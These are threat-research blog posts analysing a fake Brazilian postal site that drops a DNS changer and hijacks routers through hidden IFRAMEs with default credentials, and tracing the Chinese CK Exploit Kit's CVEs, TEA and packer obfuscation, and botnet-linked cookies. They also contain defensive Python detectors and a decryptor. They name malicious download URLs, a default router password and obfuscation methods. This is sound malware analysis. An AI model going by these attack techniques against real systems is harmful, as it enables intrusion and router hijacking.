Fake Brazilian Postal Site Downloads DNS Changer Trojan and Launches Attacks on Routers

I ran across a site that tries to mess with system and router DNS settings.  The site includes hidden IFRAMES in order to access administration interfaces from within the local area network.  The site also uses a malicious JavaScript to spawn a fake Flash update window that downloads a DNS changer trojan.  These types of attacks are nothing new, but the domains and files used in these attacks do not suffer from poor web reputations or trigger many AV alerts.

The attack begins with a malicious site masquerading as a Brazilian Postal Service (Correios) site for searching zip codes.  The malicious site is buscacepcerto[.]com.   The legitimate site is buscacep.correios.com.br.  The malicious site creates an IFRAME that displays the legitimate site in the browser while downloading a malicious JavaScript file and contacting a second malicious site from a hidden IFRAME.  The site invoked by the hidden IFRAME is filmegratistv.tempsite[.]ws/altear-dns/index.php.  The malicious JavaScript code was imported from buscacepcerto[.]com/init.js.

[Image: iframes]

The JavaScript file downloads a DNS Changer disguised as a Flash Player update window.

[Image: DnsChanger]

The installer download button contacts shortened URL goo.gl/XB5O8v which resolves to www.buscacepcerto[.]com/AdobeFlash.exe (SHA1 4acf91b721c16e46919c73102d4bc0fa8ef218ec).

[Image: fakeInstaller]

If the user executes the file, it makes the following changes to the system registry.

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{101AD58A-72E3-4831-9F1E-01C7C72E2FAB} ], Value Name: [ NameServer ], New Value: [ 199.201.108.11,8.8.8.8 ]
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{1AD45B38-4060-4F73-BB1E-A0439A2D97EB} ], Value Name: [ NameServer ], New Value: [ 199.201.108.11,8.8.8.8 ]
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{76341E73-35E8-4915-81A7-53DE19F2314B} ], Value Name: [ NameServer ], New Value: [ 199.201.108.11,8.8.8.8 ]
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{CD1622D3-0BA5-4EAB-A1CB-1D28B1CA5B98} ], Value Name: [ NameServer ], New Value: [ 199.201.108.11,8.8.8.8 ]

The secondary DNS address, 8.8.8.8, belongs to Google.  I could not find any information about the primary address 199.201.108.11.  Only two AV vendors flag the executable as malicious in Virus Total.
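The registry entries above are the kind of sandbox output a defender can turn into a host check: any interface whose NameServer value lists a resolver outside the organisation's approved set should raise an alert. Pairing the rogue primary with 8.8.8.8 as the secondary is exactly why a test of the form "does the list contain a known-good server" is not enough; every resolver in the list has to be approved. The following Python is an added example, not code from this post or its sources. It parses records in the report format shown above, including several run together on one line, and flags unapproved resolvers on Tcpip interfaces. The interface GUIDs and the allowlist are constructed placeholders; 199.201.108.11 is the address from the report.

```python
"""Audit sandbox registry-change records for rogue DNS resolvers.

Added example for this post, not code from the post or its sources. It
parses entries in the "KEY ], Value Name: [ NAME ], New Value: [ VALUE ]"
format shown above and flags any Tcpip interface whose NameServer list
contains a resolver that is not on an approved list. Checking for
"contains 8.8.8.8" is not enough: the sample pairs a rogue primary with
Google as secondary, so every entry in the list must be approved.
"""
import re

# One record: key, value name, new value. Records may be run together.
ENTRY = re.compile(
    r"(?P<key>HKLM\\[^\]]+?)\s*\],\s*"
    r"Value Name:\s*\[\s*(?P<name>[^\]]+?)\s*\],\s*"
    r"New Value:\s*\[\s*(?P<value>[^\]]*?)\s*\]"
)
GUID = re.compile(r"\{[0-9A-Fa-f-]+\}")

# Constructed sample in the report format above. Interface GUIDs are
# placeholders; 199.201.108.11 is the resolver from the report.
SAMPLE_REPORT = (
    r"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces"
    r"\{11111111-0000-0000-0000-000000000001} ], Value Name: [ NameServer ], "
    r"New Value: [ 199.201.108.11,8.8.8.8 ]"
    r"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces"
    r"\{22222222-0000-0000-0000-000000000002} ], Value Name: [ NameServer ], "
    r"New Value: [ 10.0.0.53 ]        "
    r"HKLM\SOFTWARE\ExampleVendor\App ], Value Name: [ Path ], New Value: [ 8.8.8.8 ]"
)

# Constructed allowlist: the corporate resolver plus Google as fallback.
APPROVED_RESOLVERS = {"10.0.0.53", "8.8.8.8"}


def parse_entries(report_text):
    """Return a dict (key, name, value) for every record in the text."""
    return [m.groupdict() for m in ENTRY.finditer(report_text)]


def audit_nameservers(report_text, approved):
    """Return (interface GUID or key, [rogue resolvers]) per bad entry."""
    alerts = []
    for entry in parse_entries(report_text):
        if entry["name"].lower() != "nameserver":
            continue
        if "\\Tcpip\\Parameters\\Interfaces\\" not in entry["key"]:
            continue
        # NameServer is a comma- or space-separated list; all must be approved.
        servers = [s for s in re.split(r"[,\s]+", entry["value"]) if s]
        rogue = [s for s in servers if s not in approved]
        if rogue:
            guid = GUID.search(entry["key"])
            alerts.append((guid.group() if guid else entry["key"], rogue))
    return alerts


if __name__ == "__main__":
    for iface, rogue in audit_nameservers(SAMPLE_REPORT, APPROVED_RESOLVERS):
        print("rogue resolver(s) %s on interface %s" % (",".join(rogue), iface))
```

The same `audit_nameservers` check can be pointed at a live export of the Interfaces key; the parser only cares that the records arrive in the bracketed format above.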

In addition to the DNS Changer trojan, the hidden malicious IFRAME connecting to filmegratistv.tempsite[.]ws/alterar-dns/index.html launches a Domain Name System (DNS) attack on the router from ten additional hidden IFRAMES. These IFRAMES attempt to log in to unsecured routers, or to routers configured with known default user names and passwords, from inside the LAN.  As shown below, the username ‘admin’ and password ‘gvt12345’, for example, target the Dlink 500b-II router.
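One way to detect this pattern in fetched page content, as an added example that is not code from the post or from the site it analyses: parse the document, collect every IFRAME, and report those whose src points at a private address or embeds credentials in the URL, noting whether the frame is also visually hidden. The sample page, the 192.168.1.1 and 10.0.0.1 targets and the admin:CHANGEME credentials are all constructed for the example.

```python
"""Flag hidden IFRAMEs that point at LAN administrative interfaces.

Added example for this post, not code from the post or from the site it
analyses. A defender who has fetched a suspicious page can run this over
the HTML: it collects every IFRAME and reports those whose src targets a
private (RFC 1918 or loopback) address or embeds credentials in the URL,
noting when the frame is also visually hidden. The sample page, its hosts,
and the admin:CHANGEME credentials are constructed for the example.
"""
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

SAMPLE_PAGE = """
<html><body>
<iframe src="https://legit.example/search" width="100%" height="600"></iframe>
<iframe src="http://admin:CHANGEME@192.168.1.1/admin/dns" width="0" height="0"></iframe>
<iframe src="http://10.0.0.1/admin/dns" style="display: none"></iframe>
<iframe src="http://ads.example/banner" width="1" height="1"></iframe>
</body></html>
"""


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _tiny(value):
    """True for a width/height of 0 or 1 (with or without a unit)."""
    digits = re.sub(r"[^0-9]", "", value)
    return digits != "" and int(digits) <= 1


def is_hidden(attrs):
    """True if the frame is kept off-screen by style or by a 0/1 pixel box."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    return _tiny(attrs.get("width", "")) or _tiny(attrs.get("height", ""))


def targets_private_ip(src):
    """True if the URL host is a literal private or loopback IP address."""
    host = urlsplit(src).hostname
    if not host:
        return False
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:  # a host name rather than an IP literal
        return False


def has_userinfo(src):
    """True if the URL carries user:password@ credentials."""
    return urlsplit(src).username is not None


def scan(html):
    """Return [(src, [reasons])] for every IFRAME aimed at a LAN device."""
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        checks = (
            ("hidden", is_hidden(attrs)),
            ("private-ip", targets_private_ip(src)),
            ("credentials-in-url", has_userinfo(src)),
        )
        reasons = [name for name, hit in checks if hit]
        # A hidden frame alone is common (ads, trackers); report only when
        # it also reaches into the LAN or carries credentials.
        if any(r != "hidden" for r in reasons):
            findings.append((src, reasons))
    return findings


if __name__ == "__main__":
    for src, reasons in scan(SAMPLE_PAGE):
        print("%s  [%s]" % (src, ", ".join(reasons)))
```

The 1x1 advertising frame on a public host is deliberately not reported; the signal here is a frame that reaches into the LAN, not hiddenness by itself.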

[Image: routerAttacks]

Neither the initial malicious URL, the URLs from the hidden IFRAMES, nor the IP address of the bogus DNS server is widely recognized as malicious.  Virus Total URL scans for buscacepcerto[.]com returned no reputation issues.  Likewise, Virus Total URL scans for filmegratistv.tempsite[.]ws/altear-dns/index.php had no reputation issues.  The Virus Total URL scan for the IP of the malicious DNS server also had no reputation issues.  As mentioned earlier, the DNS Changer trojan executable masquerading as an Adobe Flash installer received only two malicious detections in Virus Total.


REFERENCES:

http://jsunpack.jeek.org/?report=3386414e290ca6e75ca335358b438ec7a8f351ac

http://anubis.iseclab.org/?action=result&task_id=1c1c8ebbce435f2441d67c248f0bf63f1

https://www.virustotal.com/en/file/37e5df6628c127bdde487c11a89e0ead4c7b6fc7915bf097bc82e1e8d4d93796/analysis/1409501460/


CK Exploit Kit in Late 2013

A new version of the CK Exploit Kit served targeted attacks using a CVE-2013-3897 exploit since at least 20 OCT 2013 and as late as 01 NOV 2013. Like earlier CVE-2013-3897 samples discovered in the wild, the exploit targeted only Internet Explorer 8 with Korean or Japanese language settings. The new CVE-2013-3897 exploit was one of six possible attack vectors used in the updated CK Exploit Kit.  The other new exploits were for CVE-2013-0422 and CVE-2013-0634.  An exploit for CVE-2012-4792 was observed earlier, but appears to have been replaced by the new CVE-2013-3897 exploit.  A rough diagram of the new CK Exploit Kit serving CVE-2013-3897 is provided below.  Exploits added since mid-2013 are outlined in red.

[Image: ckeknov-13]

In the index page, the section checking and setting cookies is much the same as the code discussed in an earlier post.  This is especially evident in the variable named CK_WM and the cookie names starting with CKADMIN.  An explanation of the variable named CK_WM is provided in my 14 April and 22 May 2013 posts.  The significance of the cookie names starting with CKADMIN is described in my 12 June 2013 post.

[Image: cookieCheck]

The cookie functions are followed by a long block of code that was packed and encrypted using the same methods observed in earlier versions of the CK Exploit Kit.  The code for selecting and calling one of the three Java exploits is first encrypted using a JavaScript implementation of the Tiny Encryption Algorithm (TEA) and then packed using a variation of Dean Edwards Packer.  The new version of the kit features the comment string “caihong vip” in the call to the unpacking function, while earlier kits included the string “ck vip” or “jsck vip” in the function call. Perhaps the new string indicates that the authors have changed the name of the kit to Cai Hong.

[Image: depacker_call]

The packed and encrypted block of code for the Java exploits in the index file is followed by separate code for the browser exploits.  If none of the conditions for the Java exploits are met, the index file code progresses to the Internet Explorer (IE) exploits for IE8, IE7 and IE6.

[Image: IEnoJava]

The CVE-2013-3897 exploit can be found in the file ZZ.HTML intended for IE 8 browsers.  Like earlier CVE-2013-3897 exploits found in the wild, the exploit code in ZZ.HTML is only run if the browser is IE 8 and language is set to Korean or Japanese.

[Image: zzEI8KoJa]

Almost all of the code in ZZ.HTML was the same as the code found in the zero-day samples discovered in the wild by Spider Labs at 1.234.31.154/mii/guy2.html.  The differences were in the shell code and the page title.  The HTML title in the ZZ files was “show” while the HTML title in the GUY2 file was “naver”.  The shell code in the ZZ files was obfuscated by replacing “%u” with “wm”.  The shell code in the GUY2 file was obfuscated using XOR 148 encoding.  The shell code in the ZZ file consisted of about 125 Unicode values while the shell code in the GUY2 file consisted of 1678 Unicode values.  The GUY2 shell code included many instructions to detect and disable common Korean anti-virus applications that were not found in the ZZ shell code.  The ZZ shell code sample shown below used URLmon.dll to download and execute the file admin22.exe.

[Image: sc]

The ASCII version of this shell code is shown below.

[Image: sctxt]

The dropped file, admin22.exe (MD5: cb3148baab0fe10aa998215feab8666c), was identified in Virus Total as [Microsoft] Trojan:Win32/Urelas.A.  The admin22.exe dropped $$WindowsXp.bat (MD5: 452e1795177453fec20db3b9e925523c) and KillWindowProtect.sys (MD5: aed685fafd6f5bdab84a8d8152d637aa).  References to SOFTWARE\Microsoft\Office\12.0\Groove and the Groove library GR99D3~1.DLL led me to think this file may implement a privilege escalation by exploiting the CVE-2010-3146 vulnerability in Microsoft Office Groove 2007.


SOURCES

Sample of the new CK variant with CVE-2013-3897
http://jsunpack.jeek.org/?report=ce7bb58bfcbc512c6e60554f9ef939326c9d7054
https://www.virustotal.com/en/ip-address/121.254.169.133/information/

Early reporting on CVE-2013-3897
http://blog.spiderlabs.com/2013/10/another-day-another-ie-zero-day.html
http://blog.spiderlabs.com/2013/10/ie-zero-day-cve-2013-3897-technical-aspects.html

Samples of CVE-2013-3897 caught in the wild
http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb
http://jsunpack.jeek.org/?report=07058210b793a02e19ce1f506d23e91e0db8cba0

Earlier CK variant serving 2012-4792
http://jsunpack.jeek.org/dec/go?report=fb98c218a8d5fec52a5d612ff428bc5ceaa27331

Sandbox of admin22.exe (MD5: cb3148baab0fe10aa998215feab8666c)
https://malwr.com/analysis/Nzg4OTQ1NWJlMTJhNGE4NDhiNmFhNzYwODY0NjdjMGI/

CK VIP Cookies and Botnets

The Chinese CK Exploit Kit was initially deployed in April 2012.  Exploit code generated from the CK Kit was identified by file, variable and function names based on the strings CK and CKWM.  The name is probably an abbreviation of CK Wǎng mǎ (CK网马), which translates to CK Network Trojan.  The web site CKWM.NET is affiliated with the CK Exploit Kit. The CK Kit is a descendant of the Net Boom NB Exploiter Kit produced from late 2010 through late 2011.  The registrant of CKWM.NET is the same as the registrant of a site, 1874.CC, that distributed the Net Boom Kits.  The CKWM.NET site is built on a popular Chinese forum software kit and incorporates a publicly available plug-in that allows administrators to sell VIP memberships with special privileges to forum users.  CKWM.NET includes a page that lists the site’s VIP members.  The VIP member user names match cookies left by the CK Exploit Kit.  I believe that each VIP user listed in CKWM.NET pages represents a botnet, and I suspect that the entire site provides a covert means to rent botnets originally harvested by the CK Exploit Kit.

Since 2007, major Chinese Exploit Kits have shared the following two attributes: explicit use of the product name in the exploit code and use of sales and support web sites to overtly market the kits.  In 2007 through 2010, exploits from the Anhey Kit included numerous references to AHWM and CUTEQQ.  AHWM was an abbreviation for Anhey Wang Ma (Network Trojan) and CUTEQQ was a reference to the Anhey marketing site, CuteQQ.cn.  In 2010 through 2011, code from the Silver Fox Exploit Kit included references to SVFOXWM, SFWM and SVFOX.NET.  SVFOXWM and SFWM were abbreviations for Silver Fox Wang Ma and SVFOX.NET was the domain name for the site that marketed and supported the Silver Fox Exploit Kit. In 2011 through 2012, code from the Net Boom NB Exploiter Kit included references to NBWM and 1874.cc.  NBWM was an abbreviation for Net Boom Wang Ma and 1874.cc was the web site used to market and service the Net Boom Kit.  Currently, the CK Exploit Kit code uses references to CKWM and is linked to the CKWM.NET site.

My 14 April 2013 post titled “The CK Exploit Kit – Net Boom’s Metamorphosis” argued that the CK Exploit Kit replaced the Net Boom Exploit Kit in early 2012.  The analysis identified several consistencies in the exploit code used by the two kits, but did not discuss links between the web sites supporting the two kits addressed in this post.  Specifically, the two kits share the exact same domain registration information as shown below.

[Image: registr]

The creation date for the two web sites corresponds with the first release of Net Boom in November 2010, the first appearance of CK in April 2012, and the subsequent migration from Net Boom to CK in April 2012.  The 1874.CC site has the appearance of a legitimate software vendor but made no attempt to hide the malicious purpose of its products.  The password protected CKWM.NET site, however, made no explicit references to exploit kit sales or service. A screen shot of 1874.CC is presented below.

[Image: 1874_cc]

Unlike 1874.CC, the CKWM.NET site shown below has the appearance of a generic internet forum site.

[Image: ckwmdotnet]

CKWM.NET is powered by version 8.5 of PHPWind, a popular forum application in China.  The background image featuring clouds, grass and flower petals blowing in the wind may be a default background image for the PHPWind application.  The CK EXPLOIT logo in the upper left corner of the page, conversely,  is from a separate image file that is unique to the CKWM.NET site.  The unique logo from the site is shown below.

[Image: CKlogo]

The use of the word “exploit” is consistent with the hypothesis that the site is distributing malware.  The green shield featured in the image has the appearance of icons used by many anti-virus and network security vendors.  Most vendors, however, combine a check mark with the green shield icon and use a yellow or red shield with an exclamation point.  The green shield with the check mark indicates that a file or internet resource is safe while the yellow or red shield with an exclamation point indicates that a file or internet resource may be harmful.   So, what would a green shield with an exclamation point indicate?  Perhaps it signifies a file or resource that is harmful but not detected by anti-virus products.

The site included a VIP membership page that provides much more evidence of malicious activity.  The VIP page is created using the publicly available PHPWind VIP Member Center (VIP会员) plug-in.  The screen shot below shows a VIP member page from CKWM.NET.

[Image: ckvipmembers]

The VIP Member Center plug-in allows the site administrator to collect fees in exchange for special privileges to paying forum users.  Some of the paying VIP members listed on the CKWM.NET page include ADMIN, JURANALEN, JTAHEATEH, XIAOYU, KYDOWN, SAYRYWN, 306953568, DADAYE, XIAOHUA and XNJ.  Who are these people?  An intuitive hypothesis is that these user names represent a community of users sharing a common interest such as online gaming or computer security.   An alternative hypothesis is that the VIP member names do not represent actual people at all but rather are names given to botnets harvested using CK Exploit Kit attack code.  Evidence supporting this hypothesis is explored below.

One feature of the CK Exploit Kits was the inclusion of variations of the comment string /*CK VIP*/ in the code’s function calls to an open source JavaScript packer.  This code is described in my 22 May 2013 post.  I believe these comments are references to the CK VIP Member page found on CKWM.NET.  The index page for the CK web exploits uses distinctive cookies created from the concatenation of the string CK and the VIP user names listed on the CKWM.NET VIP Member page.  For example, the VIP member user name JURANALEN is present in the cookie string CKJURANALEN.  The following five images show examples of the relationship between the VIP usernames and the cookies used in CK exploit code for CKADMIN, CKJURANALEN, CKJTAHEATEH, KYDOWN and CKXIAOHUA.

[Image: vip-ckadmin]

[Image: vip-ckjuranalenn]

[Image: vip-ckjtaheateh]

[Image: vip-ckdown]

[Image: vip-ckxiaohua]

The site includes another VIP page that is password protected.  It is likely that the page used in this analysis is out of date.  The latest VIP member starting date on the page was 17 July 2012.  More recent CK VIP cookies were probably added after July 2012.  The CK exploit kit cookie CKTTCYWAXX, for example, was first seen in October 2012 and continued to be used until at least April 2013.


CONCLUSIONS:

The CK Exploit Kit is associated with the CKWM.NET site that is probably used for sales and service.  The CKWM.NET domain name registration information is exactly the same as the registration information for a known Chinese malware site named 1874.CC.  Previous posts explained that the 1874.CC site is associated with the Net Boom Exploit Kit, and the Net Boom Exploit Kit evolved into the CK Exploit Kit.

Unlike earlier Chinese malware sales and service sites, the relationship between CKWM.NET and the CK Exploit Kit is not immediately obvious.  The CKWM.NET site name and logo provide some speculative evidence about the relationship between the site and the malware exploit kit.   A page listing CKWM.NET VIP members provides solid evidence linking the site to CK Exploit code.

Despite the analysis presented in this post, it is still unclear exactly how the site is used to sell malware code or services to cyber criminals.  Unlike earlier Chinese exploit kit vendor sites I have seen, CKWM.NET does not seem to be advertising an exploit code generator.  Perhaps the CKWM site provides botnets for rent.  These botnets are identified by the cookies used by the initial exploit vectors provided by the CK Exploit code.  The VIP Member Center plug-in used by the CKWM.NET site provides a means for facilitating financial transactions between the bot herders and cyber criminals.


REFERENCES:

The CK Exploit Kit – Net Boom’s Metamorphosis (CK Exploit Kit and NB Exploit Kit)

CK Exploit Kit in Early 2013 (CK Exploit Kit)

Anhey Menagerie (AHWM and CUTEQQ.CN)

Silver Fox Gallery (SVFOXWM and SVFOX.NET)

Net Boom Kits and Signatures (NBWM and 1874.CC)

The Last Net Boom Exploit Packs (NBWM and 1874.CC)

http://w3patrol.com/d/1874.cc (1874.cc domain registration)

http://w3patrol.com/d/ckwm.net (ckwm.net domain registration)

http://www.phpwing.net (PHPWind Site)

http://www.phpwind.net/read/1349115 (VIP Member Center Plug-in)

http://www.jsunpack.jeek.org/ (repository for code featuring CK VIP cookies)


CK Exploit Kit in Early 2013

The Chinese CK Exploit Kit was initially deployed in April 2012.  Exploit code generated from the CK Kit was identified by file, variable and function names based on the strings CK and CKWM.  The CK Kit is a descendant of the Net Boom NB Exploiter Kit produced from late 2010 through late 2011 as described in my 14 April 2013 and 30 March 2013 posts.  The initial versions of the CK included a JAVA CVE-2011-3544 exploit, Flash CVE-2012-0611, CVE-2012-2140 and CVE-2012-0754 exploits, and MSIE CVE-2010-0806 and CVE-2012-0003 exploits.  By early 2013, exploits for JAVA CVE-2012-4681, Flash CVE-2012-1535 and MSIE CVE-2012-1889, and CVE-2012-4969 were added to the package.  Exploits for MSIE CVE-2010-0806 and CVE-2012-0003 were removed from the package.  Exploits for JAVA CVE-2011-1344, Flash CVE-2012-0754, Flash CVE-2012-2140 and Flash CVE-2011-0611 were retained.   The figure below approximates the state of the CK Exploit kit in May 2013.

[Image: ck2013]

The boxes outlined in blue represent exploits that were carried over from the initial CK Exploit Kit.  The boxes outlined in red represent exploits added to the kit by early 2013.  The gray-filled boxes represent exploits removed by early 2013.

Google cached a full set of CK files in early March 2013.  The cache lists files served by an HTTP File Server (HFS) and accessed through fast flux domain names based on “*.*fj.gs.net.cm”.  The files show what a complete CK exploit package looked like in early 2013 but were not available for download and analysis.  The site “wswm.0412game.com” (210.56.53.34) included all of the exploits listed above except CVE-2012-4681.  The CK exploit for CVE-2012-4681 was served from several sites, including kwhts.com (211.43.203.23) on 10 March 2013, asfa2d2d.info (192.30.136.89) on 24 March 2013, and qichejiaodian.info (199.114.244.115) on 11 April 2013.  These servers offered the same CVE-2011-3544, CVE-2012-1889 and CVE-2012-4969 exploits as the 210.56.53.34 server in addition to the CVE-2012-4681 exploit, but did not include the Flash exploits served from 210.56.53.34.

Primary Encryption and Obfuscation Methods used with the New Exploits

Files delivering the CVE-2012-4681, CVE-2012-1535, CVE-2012-1889 and CVE-2012-4969 exploits were encrypted using the Tiny Encryption Algorithm (TEA) combined with Base64 encoding.  The kit had used TEA encryption since at least October 2012 as seen here.  More information and JS code samples for TEA are available on the Movable Type LTD site (movable-type.co.uk).

The TEA cipher text and decryption code for the CVE-2012-1535, CVE-2012-1889 and 2012-4969 exploits were obscured by Dean Edward’s Packer.  The string “eval(function(p,a,c,k,e,r)”  in the script code normally indicates the presence of Dean Edward’s Packer.  The CK exploit kits obscured this string by impregnating it with comments based on CK VIP.  The kit used this method of obfuscation since at least September 2012 as seen here.   Some current samples are shown below.

[Image: ckvip]

Some samples of decrypted code for these exploits are discussed below.  The files were unpacked using jsbeautifier.org and the encryption was broken using JS TEA code from movable-type.co.uk.
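Breaking the encryption amounts to running the same TEA routine backwards with the password recovered from the unpacked script. The following Python is an added example, not code from the kit or from movable-type.co.uk; it is a stand-alone re-implementation of Block TEA (XXTEA), the variant the Movable Type string routines use, with Base64 on the outside, so an analyst can decrypt a captured block offline. The string packing conventions (little-endian 32-bit words, NUL padding to at least two words, password truncated or padded to 16 bytes) are assumptions about that script; the cipher core is standard XXTEA, and the round trip at the bottom shows the shape of the work.

```python
"""Block TEA (XXTEA) with Base64, as used to wrap the CK exploit code.

Added example, not code from the kit or from movable-type.co.uk. The kit
relied on the Movable Type JavaScript TEA routines; this is a Python
re-implementation of the same XXTEA algorithm so an analyst can decrypt
a captured block offline once the password has been pulled out of the
unpacked script. The string packing (little-endian 32-bit words, NUL
padding, password truncated/padded to 16 bytes) is an assumption about
that script's conventions; the cipher core is standard XXTEA.
"""
import base64
import struct

DELTA = 0x9E3779B9
MASK = 0xFFFFFFFF


def _mx(total, y, z, p, e, key):
    """The XXTEA mixing function, kept to 32 bits."""
    return ((((z >> 5) ^ ((y << 2) & MASK)) + ((y >> 3) ^ ((z << 4) & MASK)))
            ^ ((total ^ y) + (key[(p & 3) ^ e] ^ z))) & MASK


def xxtea_encrypt(v, key):
    """Encrypt a list of n >= 2 uint32 words with a 4-word key."""
    v = list(v)
    n = len(v)
    rounds = 6 + 52 // n
    total = 0
    z = v[-1]
    for _ in range(rounds):
        total = (total + DELTA) & MASK
        e = (total >> 2) & 3
        for p in range(n - 1):
            y = v[p + 1]
            v[p] = (v[p] + _mx(total, y, z, p, e, key)) & MASK
            z = v[p]
        y = v[0]
        v[n - 1] = (v[n - 1] + _mx(total, y, z, n - 1, e, key)) & MASK
        z = v[n - 1]
    return v


def xxtea_decrypt(v, key):
    """Inverse of xxtea_encrypt: same schedule, walked backwards."""
    v = list(v)
    n = len(v)
    rounds = 6 + 52 // n
    total = (rounds * DELTA) & MASK
    y = v[0]
    for _ in range(rounds):
        e = (total >> 2) & 3
        for p in range(n - 1, 0, -1):
            z = v[p - 1]
            v[p] = (v[p] - _mx(total, y, z, p, e, key)) & MASK
            y = v[p]
        z = v[n - 1]
        v[0] = (v[0] - _mx(total, y, z, 0, e, key)) & MASK
        y = v[0]
        total = (total - DELTA) & MASK
    return v


def _key_words(password):
    # Assumed convention: UTF-8 password cut or NUL-padded to 16 bytes.
    raw = password.encode("utf-8")[:16].ljust(16, b"\x00")
    return list(struct.unpack("<4I", raw))


def _to_words(data):
    # Assumed convention: NUL-pad to a word boundary and at least 2 words.
    data = data.ljust(max(8, (len(data) + 3) // 4 * 4), b"\x00")
    return list(struct.unpack("<%dI" % (len(data) // 4), data))


def _from_words(words):
    return struct.pack("<%dI" % len(words), *words)


def tea_encrypt(plaintext, password):
    """Plain string -> Base64 text, as the kit's landing pages carry it."""
    words = xxtea_encrypt(_to_words(plaintext.encode("utf-8")), _key_words(password))
    return base64.b64encode(_from_words(words)).decode("ascii")


def tea_decrypt(ciphertext_b64, password):
    """Base64 text -> plain string; trailing NUL padding is dropped."""
    words = xxtea_decrypt(_to_words(base64.b64decode(ciphertext_b64)), _key_words(password))
    return _from_words(words).rstrip(b"\x00").decode("utf-8", errors="replace")


if __name__ == "__main__":
    # Constructed sample: a harmless stand-in for the encrypted exploit block.
    blob = tea_encrypt("var CKWM = 'sample';", "ck vip")
    print(blob)
    print(tea_decrypt(blob, "ck vip"))
```

If a captured block does not decrypt cleanly with these packing assumptions, compare the word order and padding against the unpacked JavaScript decryptor before suspecting the password; the cipher loop itself is fixed by the algorithm.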

CVE-2012-4681 Exploit Added to the Index page

The index page for the updated CK Exploit Kit added exploit code for Java CVE-2012-4681 to the existing Java CVE-2011-1354 exploit.  These two exploits are called from an index page often named CK.HTML or CC.HTML.  The exploit for CVE-2012-4681 may have been added as early as 25 December 2012.  A decrypted sample taken from qichejiaodian.info on 11 April 2013 is shown below.

[Image: ck2013Index]

CVE-2012-1535 Exploit Added to the 1.HTML

The original version of the CK Exploit Kit included a file named 1.HTML that was called from the index page and used to deliver the appropriate Flash exploit to the victim’s browser.  The new version of the kit added files LOG.HTML and WMCK.SWF that implemented a CVE-2012-1535 exploit to the 1.HTML file.  The exploit for CVE-2012-1535 has probably been in use by CK since at least 9 September 2012 as seen here.  A decrypted copy of LOG.HTML taken from wswm.0412game.com on 30 April 2013 is shown below.

[Image: cklog]

LOG.HTML calls WMCK.SWF.  Virustotal results for the file WMCK.SWF confirm that the SWF file contains a CVE-2012-1535 exploit.

CVE-2012-1889 Exploit Replaced the CVE-2010-0806 Exploit

The exploit for MSIE CVE-2012-1889 was contained in the file named ZIP.HTML.  It replaced the CVE-2010-0806 exploit that was contained in a file named POP.HTML. A sample of the CVE-2012-1889 exploit was served by qichejiaodian.info on 11 April 2012.  ZIP.HTML provided an obfuscated payload URL in the array variable SS that was declared before the packed and encrypted block as shown below.

[Image: ckzippkd]

The deobfuscation code for the payload URL, together with the shellcode for the exploit, was hidden in the Dean Edward’s packed and TEA encrypted block of the code.  Deobfuscation reveals the presence of Unicode encoding of ASCII characters further obscured by XOR BD encoding.  The plain text version of the packed and encrypted code block is shown below.

[Image: ck2013ZipSc]

Function CKCKCKCKCKCKCKCK deobfuscates the payload URL.  In the sample observed at qichejiaodian.info/zip.html, the payload string breaks out to hXXp://down.3dianshi.com/smss.txt. The unpacked and decrypted shellcode was contained in the variable CKWMCKWM.  The shellcode was further obfuscated with padding strings that replaced “%u” characters with the string “cgTw”.

The heap spray and trigger code for the CVE-2012-1889 exploit in ZIP.HTML was presented plain text below the packed and encrypted block of code.  The heap spray was implemented using Alexander Sotirov’s JavaScript Heap Exploitation library as described here.  The trigger code is shown below.

[Image: ckziphstrg]

CVE-2012-4969 Exploit Replaced the CVE-2012-0003 Exploit

An exploit for MSIE CVE-2012-4969 was included in the early 2013 versions of the kit. The exploit was initiated through WIN.HTML and triggered from WIP.HTML.  It replaced the CVE-2012-0003 exploit contained in MOP.HTML.

The obfuscated payload URL was provided in the array variable OMG and part of the heap spray code was provided at the bottom of the file as shown below in the code fragment from qichejiaodian.info/win.html on 11 April 2013.  An IFrame called the trigger code from WIP.HTML.

[Image: ckwin-outline]

The CVE-2012-4969 trigger code from WIP.HTML, with its colorful function names, is shown below.  The names HOLY and SHIT follow the payload variable named OMG.  Taken together, the sequence of names probably equates to the slang expression “Oh my god, Holy Shit!”  This bit of humor indicates that the authors of the code have some comfort with American English colloquialisms as well as heap-based buffer overflows.

[Image: ck2013WipTrigger]

The main body of the shellcode and the deobfuscation code for the payload URL were hidden by encryption from TEA and obfuscation from Dean Edward’s Packer.  The payload URL decryption function (BMW) and shellcode are shown below.

[Image: ck2013WinSc]

The unpacked and decrypted shellcode was further obfuscated with padding strings that replaced “%u” characters.  Deobfuscation reveals the presence of Unicode encoding of ASCII characters and XOR BD encoding.  The function BMW deobfuscates the payload array variable OMG, resulting in the URL hXXp://down.3dianshi.com/smss.exe. The Scumware.org database shows that down.3dianshi.com resolved to the same IP (199.114.244.115) as qichejiaodian.info on 12 April 2013.  The file down.3dianshi.com/smss.exe served from 199.114.244.115 had an MD5 value of 0D443957B5F689B94BC0717AA753DC9E.  Analysis of that file by ThreatExpert on 12 April 2013 shows network activity linking back to 199.114.244.115 and producing traffic indicative of a Gh0st RAT infection as shown below:

[Image: gh0st]
